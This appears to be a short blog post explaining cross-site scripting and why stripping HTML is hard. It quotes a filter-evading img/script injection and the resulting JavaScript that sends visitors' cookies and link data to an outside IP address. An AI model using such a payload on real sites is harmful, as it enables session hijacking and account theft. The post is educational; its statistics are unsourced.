As usual, the introduction of new technology brings with it new risks and vulnerabilities. XSS (Cross Site Scripting) is when users inject code into web pages that are viewed by others. As an end user, you would typically never know that this is being done and Web 2.0 sites are particularly vulnerable to this as they allow users to post HTML rich content.

One of the solutions is to check all the html and try to strip out what could be malicious. The problem with this is deciding what is malicious and what is not.

An example found on codinghorror.com:

User input

• <img src=""http://www.a.com/a.jpg<script type=text/javascript
  src="http://1.2.3.4:81/xss.js">" /><<img
  src=""http://www.a.com/a.jpg</script>"

This would typically not be picked up as malicious, but at runtime this code gets converted to

• window.location="http://1.2.3.4:81/r.php?u="
  +document.links[1].text
  +"&l="+document.links[1]
  +"&c="+document.cookie;

This effectively means that all the information in your cookie has now been transmitted to another server. Cookies are used in practically all sites and getting access to a user’s cookie basically means that you have access to everything for that user on that site.

About 70% of web sites are open to these attacks. Digg, GMail and Wikipedia have all been successfully hacked using this.

Depending on the sites that we run, this could be a problem or a non-issue. It has to be in the back of minds though that these things are possible and we need to take steps where appropriate to prevent this from happening